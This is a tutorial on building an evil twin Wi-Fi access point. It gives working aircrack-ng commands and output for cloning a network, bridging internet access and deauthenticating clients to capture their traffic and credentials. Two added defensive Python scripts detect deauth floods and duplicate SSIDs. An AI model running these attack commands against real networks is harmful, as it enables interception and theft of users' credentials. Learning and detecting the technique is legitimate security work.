How to Create an Evil Twin or Fake Access Point

Introduction
An evil twin is a fake wireless access point that appears as a genuine hotspot offered by a legitimate provider. The idea is to set up a malicious wireless network with the same SSID name as the original one.
Devices that connect to Wi-Fi networks, such as laptops, tablets, and smartphones, have no way to distinguish between two Wi-Fi networks with the same SSID name.
This enables hackers to set up malicious wireless networks that can capture traffic and extract sensitive information from victims.
Enable Monitor Mode
The first step is to enable monitor mode on your wireless interface. This can be accomplished by executing the airmon-ng start wlan0 command.
airmon-ng start wlan0
This will change wlan0 to wlan0mon, which indicates that your wireless interface is now in monitor mode.
Locate the Target Wireless Network
The second step is to start scanning nearby wireless routers and locate the Wi-Fi network which you want to clone. Execute the following command:
airodump-ng wlan0mon
CH 6][ BAT: 3 hours 9 mins ][ Elapsed: 8 s ][ 2014-05-20 11:10

BSSID              PWR  Beacons  #Data, #/s  CH  MB   ENC   CIPHER  AUTH  ESSID
28:EF:01:34:64:92  -29  19       1       0   6   54e  WPA2  CCMP    PSK   Linksys
28:EF:01:35:34:85  -42  17       0       0   6   54e  WPA2  CCMP    PSK   SkyNet
28:EF:01:34:64:91  -29  19       1       0   1   54e  WPA2  CCMP    PSK   TP-LINK
28:EF:02:33:38:86  -42  17       0       0   11  54e  WPA2  CCMP    PSK   CISCO-Net

BSSID              STATION            PWR  Rate   Lost  Packets  Probes
28:EF:01:35:34:85  28:EF:01:23:46:68  -57  0 - 1  0     1

The wireless network I will be cloning in this tutorial is the SkyNet network, with BSSID 28:EF:01:35:34:85 and channel 6.
Create the Evil Twin
Once you’ve found the network which you wish to clone, run the following command in another terminal:
airbase-ng -a 28:EF:01:35:34:85 -e SkyNet -c 6 wlan0mon

$ airbase-ng -a 28:EF:01:35:34:85 --essid SkyNet -c 6 wlan0mon
21:39:29 Created tap interface at0
21:39:29 Trying to set MTU on at0 to 1500
21:39:29 Trying to set MTU on wlan0mon to 1800
21:39:29 Access Point with BSSID 28:EF:01:35:34:85 started.

This command creates an Evil Twin network with the SSID name SkyNet; however, it will not be able to provide internet access yet.
Provide Internet Access to the Evil Twin
I will add a bridge interface called fake; you can name it anything you like.
brctl addbr fake
Now add the two interfaces you’re bridging, eth0 and at0 (make sure eth0 has internet access).
brctl addif fake eth0
brctl addif fake at0
Assign IP addresses to the interfaces and bring them up using ifconfig:
ifconfig at0 0.0.0.0 up
ifconfig fake up
You can take a look at the bridge network interface with ifconfig:
ifconfig
at0       Link encap:Ethernet HWaddr 74:85:2a
          inet6 addr: fe80::7685:2aff:5b08/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
          RX packets:4 errors:0 dropped:0 overruns:0 frame:0
          TX packets:349 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:500
          RX bytes:540 (540.0 B) TX bytes:54845 (53.3 KiB)

eth0      Link encap:Ethernet HWaddr c8:bc:c8
          inet addr:10.0.0.19 Bcast:10.0.0.255 Mask:255.255.255.0
          inet6 addr: fe80::cabc:a6c1/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
          RX packets:640 errors:0 dropped:0 overruns:0 frame:0
          TX packets:529 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:457344 (446.6 KiB) TX bytes:94347 (92.2 KiB)
          Interrupt:17

fake      Link encap:Ethernet HWaddr 74:85:2a
          inet addr:10.0.0.194 Bcast:10.0.0.255 Mask:255.255.255.0
          inet6 addr: fe80:::fe97:5b08/64 Scope:Link
          inet6 addr: 2601:d335:7685:2aff:fe97:5b08/64 Scope:Global
          UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
          RX packets:859 errors:0 dropped:0 overruns:0 frame:0
          TX packets:684 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:492405 (480.8 KiB) TX bytes:130130 (127.0 KiB)

Kick Wireless Clients from the Legitimate AP
The next step is to kick wireless clients off the legitimate AP; in my case, that’s the SkyNet network. You can do this by using aireplay-ng.
aireplay-ng --deauth 1000 -a 28:EF:01:35:34:85 wlan0mon
This command kicks wireless clients from the real access point network, forcing them to connect to the malicious access point.
As you can see in the output below, a client has associated with my evil twin. This information is found in the airbase-ng terminal (client 28:EF:01:23:46:68 associated).
$ airbase-ng -a 28:EF:01:35:34:85 --essid SkyNet -c 6 wlan0mon
14:50:56 Created tap interface at0
14:50:56 Trying to set MTU on at0 to 1500
14:50:56 Trying to set MTU on wlan5 to 1800
14:50:56 Access Point with BSSID 28:EF:01:35:34:85 started.
14:58:55 Client 28:EF:01:23:46:68 associated (WPA2;CCMP) to ESSID: "SkyNet"
15:03:24 Client 28:EF:01:23:46:68 associated (WPA2;CCMP) to ESSID: "SkyNet"

At this point, all of the victim’s traffic is going through the attacker’s machine, and the attacker can capture sensitive information, since it’s technically a Man-in-the-Middle attack.
The attacker can perform various attacks, such as DNS spoofing, which redirects the victim to a cloned or fake login page. Once the victim tries to log in, the hacker harvests the credentials.
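From the defender's side, the deauthentication burst described in this section is the most visible part of the sequence. The following is an added example, not code from the original article: a sliding-window detector over deauth records that a wireless sensor would collect. The record layout (timestamp, BSSID, destination), the window, and the threshold are assumptions, and the sample frames are constructed.

```python
from collections import deque

WINDOW_S = 5.0    # assumed sliding-window length in seconds
THRESHOLD = 20    # assumed: ordinary roaming yields only a few deauths per window
BROADCAST = "FF:FF:FF:FF:FF:FF"

def detect_deauth_floods(frames, window=WINDOW_S, threshold=THRESHOLD):
    """frames: time-ordered (timestamp_s, bssid, destination) deauth records.
    Returns one alert per BSSID per burst that reaches the threshold."""
    recent, alerting, alerts = {}, set(), []
    for ts, bssid, dest in frames:
        q = recent.setdefault(bssid, deque())
        q.append((ts, dest))
        while ts - q[0][0] > window:      # drop records older than the window
            q.popleft()
        if len(q) < threshold:
            alerting.discard(bssid)       # burst over; allow a fresh alert later
        elif bssid not in alerting:
            alerting.add(bssid)
            alerts.append({"bssid": bssid, "start": q[0][0], "count": len(q),
                           "broadcast": sum(d == BROADCAST for _, d in q)})
    return alerts

def constructed_frames():
    """Constructed sample, not a capture: sparse normal deauths plus one
    broadcast burst carrying the BSSID used in the article."""
    normal = [(t, "28:EF:01:34:64:92", "28:EF:01:23:46:68") for t in (1.0, 30.0, 58.0)]
    burst = [(10 + i * 0.05, "28:EF:01:35:34:85", BROADCAST) for i in range(100)]
    return sorted(normal + burst)
```

A high share of broadcast destinations in an alert is a useful triage signal, because a legitimate AP rarely deauthenticates every client at once.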
Conclusion
Make sure that you are logging into a legitimate hotspot network and use hotspots for Web surfing only. Avoid making online purchases or any other financial transactions that require account numbers and passwords.
Also, if you see two identical network names, then perhaps you should avoid connecting to either one of those networks.
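The "two identical network names" check can be automated on the network owner's side. The following is an added example, not code from the original article: it parses AP rows in airodump-ng's column order and compares them with a baseline for the protected SSID. The baseline values come from the scan shown earlier; the open-network row, the 02:00:00:AA:BB:CC BSSID, and the signal threshold are constructed assumptions.

```python
import re

# Assumed baseline for the article's network, taken from its airodump-ng scan.
BASELINE = {"SkyNet": {"bssids": {"28:EF:01:35:34:85"}, "channel": 6, "enc": "WPA2"}}
PWR_SPREAD_DB = 15  # assumed threshold; a fixed AP seen by a fixed sensor varies less

# Constructed observations in airodump-ng column order (not real captures).
SAMPLE_SCAN = """\
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
28:EF:01:34:64:92 -29 19 1 0 6 54e WPA2 CCMP PSK Linksys
28:EF:01:35:34:85 -42 17 0 0 6 54e WPA2 CCMP PSK SkyNet
28:EF:01:35:34:85 -20 40 0 0 6 54 OPN SkyNet
02:00:00:AA:BB:CC -31 25 0 0 11 54e WPA2 CCMP PSK SkyNet
28:EF:01:35:34:85 28:EF:01:23:46:68 -57 0 - 1 0 1 SkyNet
"""
MAC_RE = re.compile(r"^(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$")

def parse_ap_rows(text):
    """Parse AP rows; skip headers and station rows (second field is a MAC)."""
    rows = []
    for line in text.splitlines():
        f = line.split()
        if len(f) < 9 or not MAC_RE.match(f[0]) or MAC_RE.match(f[1]):
            continue
        enc = f[7]
        start = 8 if enc == "OPN" else 10  # open networks have no CIPHER/AUTH columns
        rows.append({"bssid": f[0].upper(), "pwr": int(f[1]), "channel": int(f[5]),
                     "enc": enc, "essid": " ".join(f[start:])})
    return rows

def find_suspects(rows, baseline=BASELINE):
    """Return (bssid, essid, reason) for rows that contradict the baseline."""
    findings, pwr_seen = [], {}
    for r in rows:
        known = baseline.get(r["essid"])
        if known is None:
            continue  # not a protected network
        if r["bssid"] not in known["bssids"]:
            findings.append((r["bssid"], r["essid"], "unknown BSSID"))
            continue
        if r["enc"] != known["enc"]:
            findings.append((r["bssid"], r["essid"], "security mismatch"))
        if r["channel"] != known["channel"]:
            findings.append((r["bssid"], r["essid"], "channel mismatch"))
        pwr_seen.setdefault(r["bssid"], []).append(r["pwr"])
    for bssid, pwrs in pwr_seen.items():
        if max(pwrs) - min(pwrs) > PWR_SPREAD_DB:
            findings.append((bssid, "*", "signal spread suggests two transmitters"))
    return findings
```

A clone that copies the BSSID, channel, and security settings passes the attribute checks, so the signal-spread check across repeated scans is the only one here that can still flag it.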
